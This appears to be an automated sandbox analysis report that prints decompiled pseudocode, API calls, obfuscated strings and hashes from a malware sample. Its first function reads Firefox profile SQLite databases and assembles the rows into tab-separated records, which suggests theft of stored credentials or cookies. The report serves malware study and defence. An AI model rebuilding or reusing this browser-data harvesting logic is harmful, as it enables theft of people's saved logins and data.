							_t326 =  >=  ?  *((void*)(_t595 - 0x100)) : _t595 - 0x100;
							_push(_t595 - 0x94);
							_push( >=  ?  *((void*)(_t595 - 0x100)) : _t595 - 0x100);
							if( *((intOrPtr*)( *0x24c1cc))() == 0) {
								asm("movaps xmm0, [0x23dd10]");
								_t454 = 0;
								asm("movups [ebp-0x164], xmm0");
								 *((intOrPtr*)(_t595 - 0x124)) = 0x60767a;
								asm("movaps xmm0, [0x23dcd0]");
								asm("movups [ebp-0x154], xmm0");
								asm("movaps xmm0, [0x23dd70]");
								asm("movups [ebp-0x144], xmm0");
								asm("movaps xmm0, [0x23dd40]");
								asm("movups [ebp-0x134], xmm0");
								do {
									 *(_t595 + _t454 - 0x163) =  *(_t595 + _t454 - 0x163) ^  *(_t595 - 0x164);
									_t454 = _t454 + 1;
									_t611 = _t454 - 0x42;
								} while (_t454 < 0x42);
								_t456 = _t595 - 0x163;
								 *((char*)(_t595 - 0x121)) = 0;
								_t331 =  *((intOrPtr*)( *0x24c1dc))( *((intOrPtr*)(_t595 - 0x94)), _t456, 0xffffffff, _t595 - 0x14, 0);
								_t599 = _t599 + 0x14;
								_t584 = _t331;
								_push(_t456);
								E001D1CAC(_t595 - 0x238, _t611);
								 *((char*)(_t595 - 4)) = 0xe;
								if(_t331 == 0) {
									while(1) {
										_push( *((intOrPtr*)(_t595 - 0x14)));
										if( *((intOrPtr*)( *0x24c1d0))() != 0x64) {
											break;
										}
										_t359 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t595 - 0x14)), 0);
										 *((intOrPtr*)(_t595 - 0x90)) = _t359;
										_t361 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t595 - 0x14)), 1);
										 *((intOrPtr*)(_t595 - 0xc4)) = _t361;
										_t363 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t595 - 0x14)), 2);
										 *((intOrPtr*)(_t595 - 0xbc)) = _t363;
										_t364 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t595 - 0x14)), 3);
										 *((intOrPtr*)(_t595 - 0xb8)) = _t364;
										_t366 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t595 - 0x14)), 4);
										 *((intOrPtr*)(_t595 - 0x6c)) = _t366;
										_t368 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t595 - 0x14)), 5);
										_t495 =  *0x24c220; // 0x0
										_t579 = 0;
										 *((intOrPtr*)(_t595 - 0x70)) = _t368;
										_t589 = 0xc;
										while(1) {
											_t369 =  *0x24c224; // 0x0
											asm("cdq");
											if(_t579 >= (_t369 - _t495) / _t589) {
												break;
											}
											_t400 =  *0x24c214; // 0x0
											if( *((intOrPtr*)(_t400 + _t579 * 4)) == 0) {
												_t592 = 0;
												 *(_t595 - 0x8c) = 0;
												while(1) {
													_t566 = _t579 * 0xc;
													 *(_t595 - 0xd0) = _t566;
													asm("cdq");
													if(_t592 >= ( *((intOrPtr*)(_t566 + _t495 + 4)) -  *((intOrPtr*)(_t566 + _t495))) /  *(_t595 - 0x98)) {
														break;
													}
													 *((intOrPtr*)(_t595 - 0x60)) = 0;
													 *((intOrPtr*)(_t595 - 0x50)) = 0;
													 *((intOrPtr*)(_t595 - 0x4c)) = 0xf;
													L001D2F8E( *((intOrPtr*)(_t595 - 0x90)));
													_t405 =  *0x24c220; // 0x0
													_t406 = E001D23AD(_t595 - 0x60, _t592 * 0x18 +  *((intOrPtr*)( *(_t595 - 0xd0) + _t405)), 0);
													E001D2F2D(_t595 - 0x60);
													if(_t406 != 0xffffffff) {
														_t408 =  *0x24c214; // 0x0
														 *((intOrPtr*)(_t408 + _t579 * 4)) = 1;
													}
													_t495 =  *0x24c220; // 0x0
													_t592 =  *(_t595 - 0x8c) + 1;
													 *(_t595 - 0x8c) = _t592;
												}
												_t589 = 0xc;
											}
											_t579 = _t579 + 1;
										}
										_t372 = L001F57CC(0x23935b,  *((intOrPtr*)(_t595 - 0x90)));
										 *((char*)(_t595 - 0x33)) = 0;
										__eflags = 0x51;
										 *((char*)(_t595 - 0x35)) = 0x58;
										 *((char*)(_t595 - 0x34)) = 9;
										_t590 = L001F57CC(_t372, _t595 - 0x34);
										 *((intOrPtr*)(_t595 - 0x26)) = 0x4d4a4c18;
										_t547 = 0x18;
										 *((short*)(_t595 - 0x22)) = 0x5d;
										_t498 = 0;
										while(1) {
											 *(_t595 + _t498 - 0x25) =  *(_t595 + _t498 - 0x25) ^ _t547;
											_t498 = _t498 + 1;
											__eflags = _t498 - 4;
											if(_t498 >= 4) {
												break;
											}
											_t547 =  *((intOrPtr*)(_t595 - 0x26));
										}
										 *((char*)(_t595 - 0x21)) = 0;
										_t376 = L001F57CC(_t590, _t595 - 0x25);
										 *((char*)(_t595 - 0x36)) = 0;
										 *((char*)(_t595 - 0x38)) = 0x5b;
										 *((char*)(_t595 - 0x37)) = 9;
										_t380 = L001F57CC(L001F57CC(_t376, _t595 - 0x37),  *((intOrPtr*)(_t595 - 0xc4)));
										 *((char*)(_t595 - 0x39)) = 0;
										 *((char*)(_t595 - 0x3b)) = 0x35;
										 *((char*)(_t595 - 0x3a)) = 9;
										_t591 = L001F57CC(_t380, _t595 - 0x3a);
										_t384 = E002053B0( *((intOrPtr*)(_t595 - 0xbc)), "1");
										_t505 = 0;
										__eflags = _t384;
										if(_t384 != 0) {
											_t554 = 0x25;
											 *((intOrPtr*)(_t595 - 0x1f)) = 0x69646325;
											 *((short*)(_t595 - 0x1b)) = 0x6076;
											 *((char*)(_t595 - 0x19)) = 0;
											while(1) {
												 *(_t595 + _t505 - 0x1e) =  *(_t595 + _t505 - 0x1e) ^ _t554;
												_t505 = _t505 + 1;
												__eflags = _t505 - 5;
												if(_t505 >= 5) {
													break;
												}
												_t188 = _t595 - 0x1f; // 0x69646325
												_t554 =  *_t188;
											}
											 *((char*)(_t595 - 0x19)) = 0;
											_t555 = _t595 - 0x1e;
										} else {
											_t565 = 0x2c;
											 *((intOrPtr*)(_t595 - 0x32)) = 0x797e782c;
											 *((short*)(_t595 - 0x2e)) = 0x69;
											while(1) {
												 *(_t595 + _t505 - 0x31) =  *(_t595 + _t505 - 0x31) ^ _t565;
												_t505 = _t505 + 1;
												__eflags = _t505 - 4;
												if(_t505 >= 4) {
													break;
												}
												_t178 = _t595 - 0x32; // 0x797e782c
												_t565 =  *_t178;
											}
											 *((char*)(_t595 - 0x2d)) = 0;
											_t555 = _t595 - 0x31;
										}
										_t385 = L001F57CC(_t591, _t555);
										 *((char*)(_t595 - 0x3e)) = 0x10;
										 *((char*)(_t595 - 0x3c)) = 0;
										 *((char*)(_t595 - 0x3d)) = 9;
										_t389 = L001F57CC(L001F57CC(_t385, _t595 - 0x3d),  *((intOrPtr*)(_t595 - 0xb8)));
										 *((char*)(_t595 - 0x41)) = 0x60;
										 *((char*)(_t595 - 0x3f)) = 0;
										 *((char*)(_t595 - 0x40)) = 9;
										_t393 = L001F57CC(L001F57CC(_t389, _t595 - 0x40),  *((intOrPtr*)(_t595 - 0x6c)));
										 *((char*)(_t595 - 0x44)) = 0x47;
										 *((char*)(_t595 - 0x42)) = 0;
										 *((char*)(_t595 - 0x43)) = 9;
										_t397 = L001F57CC(L001F57CC(_t393, _t595 - 0x43),  *((intOrPtr*)(_t595 - 0x70)));
										__eflags =  *0x2485b4 - 0x10;
										_t563 =  >=  ?  *0x2485a0 : 0x2485a0;
										E001D3B98(_t595 - 0x228, L001F57CC(_t397,  >=  ?  *0x2485a0 : 0x2485a0));
										 *0x24c204 =  *0x24c204 + 1;
									}
									 *((intOrPtr*)(_t595 - 0x60)) = 0;
									 *((intOrPtr*)(_t595 - 0x50)) = 0;
									 *((intOrPtr*)(_t595 - 0x4c)) = 0xf;
									 *((char*)(_t595 - 0x60)) = 0;
									L001D2F8E( *((intOrPtr*)(_t595 - 0xb4)));
									 *((char*)(_t595 - 4)) = 0xf;
									__eflags =  *((intOrPtr*)(_t595 - 0x4c)) - 0x10;
									_t535 =  >=  ?  *((void*)(_t595 - 0x60)) : _t595 - 0x60;
									_t340 = L001F57CC(0x23935b,  >=  ?  *((void*)(_t595 - 0x60)) : _t595 - 0x60);
									 *((char*)(_t595 - 4)) = 0xe;
									E001D2F2D(_t595 - 0x60);
									_t466 = 0x18;
									 *((char*)(_t595 - 0x47)) = _t466;
									 *((char*)(_t595 - 0x45)) = 0;
									 *((char*)(_t595 - 0x46)) = 0x47;
									_t344 = L001F57CC(_t340, _t595 - 0x46);
									_t469 =  *((intOrPtr*)(_t595 - 0x68)) + 0x20;
									_t346 = E001CA1C2(_t469, _t595 - 0x188);
									_push(_t469);
									 *((char*)(_t595 - 4)) = 0x10;
									E001D3654(_t346, _t595 - 0x60);
									_t575 =  *(_t595 - 0x64) | 0x00000800;
									 *(_t595 - 0x64) = _t575;
									 *((char*)(_t595 - 4)) = 0x11;
									__eflags =  *((intOrPtr*)(_t595 - 0x4c)) - 0x10;
									_t538 =  >=  ?  *((void*)(_t595 - 0x60)) : _t595 - 0x60;
									_t584 = L001F57CC(_t344,  >=  ?  *((void*)(_t595 - 0x60)) : _t595 - 0x60);
									E001D2F2D(_t595 - 0x60);
									 *((char*)(_t595 - 4)) = 0xe;
									E001D2D4F(_t595 - 0x188);
									_t539 = 0x68;
									 *((intOrPtr*)(_t595 - 0x2c)) = 0x101c4668;
									 *((short*)(_t595 - 0x28)) = 0x1c;
									_t475 = 0;
									while(1) {
										 *(_t595 + _t475 - 0x2b) =  *(_t595 + _t475 - 0x2b) ^ _t539;
										_t475 = _t475 + 1;
										__eflags = _t475 - 4;
										if(_t475 >= 4) {
											break;
										}
										_t539 =  *((intOrPtr*)(_t595 - 0x2c));
									}
									 *((char*)(_t595 - 0x27)) = 0;
									 *((intOrPtr*)(_t595 - 0x70)) = L001F57CC(_t584, _t595 - 0x2b);
									_push(_t595 - 0x88);
									E001D2ADA(_t595 - 0x220);
									 *(_t595 - 0x64) = _t575 | 0x00004000;
									 *((char*)(_t595 - 4)) = 0x12;
									_t354 =  *((intOrPtr*)(_t595 - 0x78));
									 *((intOrPtr*)(_t595 - 0x6c)) = _t354;
									__eflags = _t354;
									if(_t354 != 0) {
										__eflags =  *((intOrPtr*)(_t595 - 0x74)) - 0x10;
										asm("movaps xmm0, [0x23d970]");
										_t588 = 0;
										_t578 =  >=  ?  *((void*)(_t595 - 0x88)) : _t595 - 0x88;
										asm("movups [ebp-0x5b], xmm0");
										 *((short*)(_t595 - 0x4b)) = 0x2e01;
										 *((char*)(_t595 - 0x49)) = 0;
										do {
											 *(_t595 + _t588 - 0x5a) =  *(_t595 + _t588 - 0x5a) ^  *(_t595 - 0x5b);
											_t588 = _t588 + 1;
											__eflags = _t588 - 0x11;
										} while (_t588 < 0x11);
										 *((char*)(_t595 - 0x49)) = 0;
										_t356 = L001F57CC(_t595 - 0x5a,  *((intOrPtr*)(_t595 - 0x70)));
										_t481 =  *0x24c210; // 0x16d8778
										E001FEA53(_t481, _t356, _t578,  *((intOrPtr*)(_t595 - 0x6c)), 3);
										_t599 = _t599 + 0xc;
									}
									 *((char*)(_t595 - 4)) = 0xe;
									E001D2F2D(_t595 - 0x88);
								}
								 *0x24c1fc( *((intOrPtr*)(_t595 - 0x14)));
								 *0x24c1ec( *((intOrPtr*)(_t595 - 0x94)));
								E001CB7A7(_t595 - 0xe8);
								E001CD63E(_t595 - 0x238);
							}
						}
						E001D2F2D(_t595 - 0xe8);
						E001D2F2D(_t595 - 0x100);
						E001D2F2D(_t595 - 0x118);
					}
					 *((intOrPtr*)(_t595 - 4)) = 4;
					E001CACAE(0, _t595 - 0xa0, _t584, __eflags);
					_t300 =  *((intOrPtr*)(_t595 - 0xa0));
					_t582 =  *((intOrPtr*)(_t595 - 0x9c));
					_t570 =  *(_t595 - 0x64);
					_t524 =  *((intOrPtr*)(_t595 - 0xa8));
					 *((intOrPtr*)(_t595 - 0x68)) = _t300;
				}
				__eflags = _t582;
				if(_t582 != 0) {
					_t300 = E001C9597(_t582);
				}
				_t424 =  *((intOrPtr*)(_t595 - 0xc8));
				__eflags =  *((intOrPtr*)(_t595 - 0xc8));
				if( *((intOrPtr*)(_t595 - 0xc8)) != 0) {
					_t300 = E001C9597(_t424);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t595 - 0xc));
				return _t300;
			}

0x001e2d2b
0x001e2d30
0x001e2d35
0x001e2d3e
0x001e2d4a
0x001e2d54
0x001e2d56
0x001e2d59
0x001e2d5c
0x001e2d8e
0x001e2d93
0x001e2d9c
0x001e2da5
0x001e2daa
0x001e2db3
0x001e2db6
0x001e2dbd
0x001e2dc8
0x001e2dd7
0x001e2ddc
0x001e2ddf
0x001e2de2
0x001e2de5
0x001e2deb
0x001e2dfe
0x001e2e03
0x001e2e09
0x001e2e0c
0x001e2e14
0x001e2e16
0x001e2e1c
0x001e2e24
0x001e2e26
0x001e2e2b
0x001e2e2b
0x001e2e2d
0x001e2e31
0x001e2e34
0x001e2e3e
0x001e2e46
0x001e2e49
0x001e2e4d
0x001e2e56
0x001e2e5c
0x001e2e63
0x001e2e65
0x001e2e69
0x001e2e6c
0x001e2e73
0x001e2e77
0x001e2e78
0x001e2e7d
0x001e2e84
0x001e2e8a
0x001e2e92
0x001e2e95
0x001e2ea6
0x001e2ead
0x001e2eb4
0x001e2eb5
0x001e2ec2
0x001e2ec8
0x001e2ece
0x001e2ed4
0x001e2edf
0x001e2ee3
0x001e2eea
0x001e2ef1
0x001e2ef6
0x001e2f07
0x001e2f0e
0x001e2f13
0x001e2f17
0x001e2f1c
0x001e2f29
0x001e2f2f
0x001e2f35
0x001e2f3b
0x001e2f40
0x001e2f4c
0x001e2f58
0x001e2f5c
0x001e2f68
0x001e2f77
0x001e2f7a
0x001e2f7e
0x001e2f87
0x001e2f8d
0x001e2f99
0x001e2fa2
0x001e2fa8
0x001e2fc0
0x001e2fc4
0x001e2fcd
0x001e2fd7
0x001e2fe2
0x001e2fea
0x001e2fee
0x001e300c
0x001e3013
0x001e3014
0x001e301b
0x001e3021
0x001e3028
0x001e302a
0x001e3031
0x001e303b
0x001e3042
0x001e3049
0x001e3050
0x001e3057
0x001e305e
0x001e3065
0x001e3072
0x001e3079
0x001e307a
0x001e307a
0x001e308b
0x001e3091
0x001e309e
0x001e30a0
0x001e30a3
0x001e30a5
0x001e30ac
0x001e30b1
0x001e30b7
0x001e30bd
0x001e30bd
0x001e30cb
0x00000000
0x00000000
0x001e30da
0x001e30e3
0x001e30ee
0x001e30f7
0x001e3102
0x001e3111
0x001e3117
0x001e3120
0x001e312b
0x001e3134
0x001e313c
0x001e3140
0x001e3146
0x001e314a
0x001e314d
0x001e314e
0x001e314e
0x001e3155
0x001e315a
0x00000000
0x00000000
0x001e3160
0x001e3168
0x001e316e
0x001e3170
0x001e3176
0x001e3176
0x001e3179
0x001e3186
0x001e318f
0x00000000
0x00000000
0x001e319a
0x001e319d
0x001e31a0
0x001e31a7
0x001e31ac
0x001e31c2
0x001e31cc
0x001e31d4
0x001e31d6
0x001e31db
0x001e31db
0x001e31e8
0x001e31ee
0x001e31ef
0x001e31ef
0x001e31fc
0x001e31fc
0x001e31fd
0x001e31fd
0x001e320e
0x001e3215
0x001e321c
0x001e321e
0x001e3224
0x001e322c
0x001e322e
0x001e3235
0x001e3237
0x001e323d
0x001e323f
0x001e323f
0x001e3243
0x001e3244
0x001e3247
0x00000000
0x00000000
0x001e3249
0x001e3249
0x001e3251
0x001e3256
0x001e325d
0x001e3266
0x001e326c
0x001e327c
0x001e3283
0x001e328c
0x001e3292
0x001e32a5
0x001e32a7
0x001e32ae
0x001e32b0
0x001e32b2
0x001e32da
0x001e32dc
0x001e32e3
0x001e32e9
0x001e32ec
0x001e32ec
0x001e32f0
0x001e32f1
0x001e32f4
0x00000000
0x00000000
0x001e32f6
0x001e32f6
0x001e32f6
0x001e32fb
0x001e32fe
0x001e32b4
0x001e32b4
0x001e32b6
0x001e32bd
0x001e32c3
0x001e32c3
0x001e32c7
0x001e32c8
0x001e32cb
0x00000000
0x00000000
0x001e32cd
0x001e32cd
0x001e32cd
0x001e32d2
0x001e32d5
0x001e32d5
0x001e3303
0x001e330a
0x001e3310
0x001e3318
0x001e3328
0x001e332f
0x001e3335
0x001e333d
0x001e334a
0x001e3351
0x001e3357
0x001e335f
0x001e336c
0x001e3371
0x001e337f
0x001e3393
0x001e3398
0x001e3398
0x001e33a9
0x001e33af
0x001e33b2
0x001e33b9
0x001e33bc
0x001e33c1
0x001e33c8
0x001e33d1
0x001e33d5
0x001e33dd
0x001e33e3
0x001e33ea
0x001e33ed
0x001e33f2
0x001e33f8
0x001e33fd
0x001e340d
0x001e3411
0x001e3416
0x001e341a
0x001e3421
0x001e3429
0x001e342f
0x001e3432
0x001e3439
0x001e343f
0x001e344b
0x001e344d
0x001e3458
0x001e345c
0x001e3461
0x001e3463
0x001e346a
0x001e3470
0x001e3472
0x001e3472
0x001e3476
0x001e3477
0x001e347a
0x00000000
0x00000000
0x001e347c
0x001e347c
0x001e3484
0x001e348e
0x001e349d
0x001e349e
0x001e34a9
0x001e34ac
0x001e34b0
0x001e34b3
0x001e34b6
0x001e34b8
0x001e34ba
0x001e34c4
0x001e34cb
0x001e34cd
0x001e34d4
0x001e34d8
0x001e34de
0x001e34e1
0x001e34e4
0x001e34e8
0x001e34e9
0x001e34e9
0x001e34f4
0x001e34f7
0x001e34fc
0x001e350a
0x001e350f
0x001e350f
0x001e3518
0x001e351c
0x001e351c
0x001e3524
0x001e3531
0x001e353e
0x001e3549
0x001e3549
0x001e301b
0x001e3554
0x001e355f
0x001e356a
0x001e356a
0x001e35a0
0x001e35a7
0x001e35ac
0x001e35b2
0x001e35b8
0x001e35bb
0x001e35c1
0x001e35c1
0x001e35c9
0x001e35cb
0x001e35cf
0x001e35cf
0x001e35d4
0x001e35da
0x001e35dc
0x001e35de
0x001e35de
0x001e35e8
0x001e35f1

APIs

__EH_prolog.LIBCMT ref: 001E2D30
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 001E2D5C

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Part of subcall function 001CAC66: __EH_prolog.LIBCMT ref: 001CAC6B

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

sqlite3_finalize.NSS3(?,?,?,?,?,?,?), ref: 001E3524
sqlite3_close.NSS3(?,?,?,?,?,?), ref: 001E3531

Strings

%cdiv`, xrefs: 001E32F6
`, xrefs: 001E332F
], xrefs: 001E3237
Profiles, xrefs: 001E2D6E
,x~yi, xrefs: 001E32CD
G, xrefs: 001E3351

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$Deallocate$FolderPathsqlite3_closesqlite3_finalize
String ID: %cdiv`$,x~yi$G$Profiles$]$`
API String ID: 71620316-2617822882
Opcode ID: 7340b1493c1818cec2808fcac4659e1b0f32ef810fcfba3f4836c08391e2d767
Instruction ID: 149b4bd4b94baa621a00c2e654dc190cdec1de0ee00a695329c3e161e98e65fc
Opcode Fuzzy Hash: 7340b1493c1818cec2808fcac4659e1b0f32ef810fcfba3f4836c08391e2d767
Instruction Fuzzy Hash: 7042B930D04398CFDF15EBA8D895BECBBB2AF65300F10819AE5497B242DB705E89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00222391, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00222391(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				signed int _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E002171CB(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E00222324(0x232518, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E00221C95(_t84, _t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E00221DB5();
					} else {
						E00221D1C(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E00222324("0&#", 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E00221DB5();
							} else {
								E00221D1C(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E002221E1(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t86 = _t119 + 0x120;
							 *_t86 = 0;
							_t114 = _t95 + 2;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t97 = _t95 - _t114 >> 1;
							_push((_t95 - _t114 >> 1) + 1);
							_t47 = E002208D5(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								L002067FE();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x247050; // 0xc1fc8d92
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E002171CB(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E002171CB(_t97, _t114) + 0x34c);
								_t127 = E00222ACC(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E002112D0(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v252) == 0 && E00222BFE(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return L002007E2(_t62, _t88, _v12 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E00218BA4(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t86 = _t119 + 0x80;
									if(E00218BA4(_t119 + 0x120, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E0022750C(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											if(E00218BA4(_t119 + 0x120, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E0022750C(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E0021C222(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E002208D5(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00222396
0x00222397
0x00222399
0x0022239e
0x002223a5
0x002223a7
0x002223aa
0x002223aa
0x002223ad
0x002223ad
0x002223b3
0x002223b6
0x002223b9
0x002223b9
0x002223bc
0x002223bf
0x002223c1
0x002223c7
0x002223c9
0x002223ce
0x002223d8
0x002223dd
0x002223df
0x002223e2
0x002223e2
0x002223e4
0x002223e8
0x00222431
0x00000000
0x002223ea
0x002223ef
0x002223f8
0x002223f1
0x002223f1
0x002223f1
0x00222403
0x0022240d
0x00222412
0x00222417
0x0022241d
0x00222421
0x0022242a
0x00222423
0x00222423
0x00222423
0x00222436
0x00222436
0x00222417
0x00222403
0x0022243c
0x00222578
0x00222578
0x00000000
0x00222442
0x00222442
0x0022244b
0x0022245c
0x00222452
0x00222452
0x00222452
0x00222463
0x00222467
0x00000000
0x0022248b
0x0022248b
0x00222490
0x00222492
0x00222492
0x00222494
0x00222499
0x00222573
0x00222575
0x0022257a
0x0022257e
0x0022249f
0x0022249f
0x002224a2
0x002224aa
0x002224ad
0x002224b0
0x002224b0
0x002224b3
0x002224b6
0x002224be
0x002224c3
0x002224ca
0x002224cf
0x002224d4
0x0022257f
0x00222581
0x00222582
0x00222583
0x00222584
0x00222585
0x00222586
0x0022258b
0x0022258f
0x00222597
0x0022259e
0x002225a1
0x002225a2
0x002225a6
0x002225a7
0x002225ac
0x002225b4
0x002225c3
0x002225cf
0x002225e0
0x002225e8
0x00222602
0x0022260f
0x00222612
0x00222615
0x00222615
0x0022261f
0x002225ea
0x002225ea
0x002225ec
0x002225ec
0x00222625
0x00222626
0x00222629
0x00222630
0x002224da
0x002224ea
0x00000000
0x002224f0
0x002224f2
0x0022250c
0x00000000
0x0022250e
0x0022250e
0x00222511
0x00222517
0x0022251a
0x0022252a
0x0022253d
0x00000000
0x00000000
0x00000000
0x00000000
0x0022251c
0x0022251c
0x0022251f
0x00222525
0x00222528
0x0022253f
0x0022253f
0x0022254b
0x0022256b
0x00000000
0x0022254d
0x0022254d
0x00222557
0x0022255c
0x00222561
0x00000000
0x00222563
0x00000000
0x00222563
0x00222561
0x00000000
0x00000000
0x00000000
0x00222528
0x0022251a
0x0022250c
0x002224ea
0x002224d4
0x00222499
0x00222467

APIs

Part of subcall function 002171CB: GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
Part of subcall function 002171CB: SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

GetACP.KERNEL32(?,?,?,?,?,?,002155FC,?,?,?,?,?,-00000050,?,?,?), ref: 00222452
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,002155FC,?,?,?,?,?,-00000050,?,?), ref: 0022247D
_wcschr.LIBVCRUNTIME ref: 00222511
_wcschr.LIBVCRUNTIME ref: 0022251F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 002225E0

Strings

utf8, xrefs: 0022254F
0&#, xrefs: 00222408

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: 0&#$utf8
API String ID: 4147378913-3980892787
Opcode ID: 4781b235fb9b1a99fc68fa3f94fd44aafa459b44210b2cd417a3513cc1cfc600
Instruction ID: 66085a8b065f95ef260164a2c687fc1d3ce718efb22c6f68026efdc7b5a2f7aa
